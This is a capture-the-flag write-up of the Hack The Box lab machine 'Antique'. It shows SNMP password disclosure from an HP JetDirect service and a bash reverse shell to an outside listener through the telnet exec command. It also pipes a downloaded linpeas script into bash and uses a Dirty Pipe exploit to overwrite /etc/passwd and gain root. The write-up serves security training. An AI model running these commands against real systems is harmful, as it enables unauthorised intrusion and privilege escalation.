Antique Writeup

10 September 2022 #CTF #HTB #box #easy #linux

Antique info

Enumeration

By an nmap scan shall we start this box:

$ sudo nmap -sC -sV -oN enum/initial.nmap 10.10.11.107
[...]
23/tcp open  telnet?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns, tn3270: 
|     JetDirect
|     Password:
|   NULL: 
|_    JetDirect
[...]

HP JetDirect

The nmap scan shows only 1 tcp port open and it's not really sure what it is. Fine, we'll check ourselves:

$ nc 10.10.11.107 23

HP JetDirect


Password: admin
Invalid password

HP JetDirect is a simple network printing protocol. Let's see if it has some known vulnerabilities:

$ searchsploit hp jetdirect
[...]
HP JetDirect Printer - SNMP JetAdmin Device Password Disclosure
[...]

Sounds good.

SNMP

SNMP is the Simple Network Management Protocol. It allows to query information about all kinds of settings like cpu temperature, disk usage, etc (a lot of things).

To make sure that SNMP is running we could perform an UDP nmap scan but it takes so long that we're going blind.

Turns out the password for HP JetDirect can be queried with basically no authentication:

$ snmpget -v 1 -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32
33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135

-v 1: use the first version of the protocol
-c public: 'public' is the community string (equivalent to password) that allows the query (yes it's that easy)
.1.3.6.1.4.1.11.2.3.9.1.1.13.0: it is the OID (identifier for the ressource we want: the password) found here

It is hexadecimal so we should decode it:

echo -n '50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32' | xxd -r -p
P@ssw0rd@123!!12

I took the first line of output (not sure why there are 2) and it definitly looks good but if we try this password:

$ nc 10.10.11.107 23

HP JetDirect


Password: P@ssw0rd@123!!12
Invalid password

But after adding a '3' at the end it works.

Foothold

Now that we have access to HP JetDirect, let's see what we can do:

$ nc 10.10.11.107 23

HP JetDirect


Password: P@ssw0rd@123!!123

Please type "?" for HELP
> ?

To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>

Parameter-name Type of value
ip: IP-address in dotted notation
subnet-mask: address in dotted notation (enter 0 for default)
default-gw: address in dotted notation (enter 0 for default)
syslog-svr: address in dotted notation (enter 0 for default)
idle-timeout: seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name: alpha-numeric string (upper case only, 32 chars max)
dhcp-config: 0 to disable, 1 to enable
allow: <ip> [mask] (0 to clear, list to display, 10 max)

addrawport: <TCP port num> (<TCP port num> 3000-9000)
deleterawport: <TCP port num>
listrawport: (No parameter required)

exec: execute system commands (exec id)
exit: quit from telnet session

How nice, there is a convenient exec command!

> exec id
uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)

Let's just get our reverse shell:

> exec bash -c 'bash -i >& /dev/tcp/10.10.14.10/4242 0>&1'

Don't forget to setup you listener...

Privesc

After looking around without any success, I decided to run linpeas, a script that looks for privilege escalation vectors.

HTB boxes do not have internet access so first download the script to your own box then transfer it to the target box.

On your local box:

$ mkdir www
$ cd www
$ wget https://github.com/carlospolop/PEASS-ng/releases/download/20220828/linpeas.sh
$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

On the target box:

lp@antique:~$ curl -s 10.10.14.10:8000/linpeas.sh | bash
[...]
Vulnerable to CVE-2021-4034

Vulnerable to CVE-2021-3560

Vulnerable to CVE-2022-0847
[...]

Damn, not 1, not 2, but 3 CVEs are exploitable on this box! Though, the third one didn't exist yet when this box was released. But I'm going to try this one, you know, for fun (:

Dirty Pipe exploit

We'll use this repo. Just get the exp.c file and transfer it to the remote box.

Now compile:

lp@antique:~$ gcc exp.c -o pwn

This vulnerability in the Linux kernel allows anyone to write to files that they do not have permission to. We can for example overwrite the /etc/passwd file to delete the password of the root user.

lp@antique:~$ head -n 1 /etc/passwd
root:x:0:0:root:/root:/bin/bash
lp@antique:~$ ./pwn /etc/passwd 1 ootz:

This is the example provided in the repo.

Let's think about what it does: we wrote 'ootz:' to the /etc/passwd file with an offset of 1 (1 byte after the beginning of the file).

The : at the end of 'ootz:' will overwrite the 'x' which is the "password":

lp@antique:~$ head -n 1 /etc/passwd
rootz::0:0:root:/root:/bin/bash

Now the root user does not have a password, meaning we can just login as root:

lp@antique:~$ su rootz
rootz@antique:/home/lp# id
uid=0(rootz) gid=0(root) groups=0(root)
rootz@antique:/home/lp# ls /root
config.py  root.txt  snap  snmp-server.py

And that's the box.

Key Takeaways

SNMP can disclose juicy information
Check CVEs for privesc after manual enumeration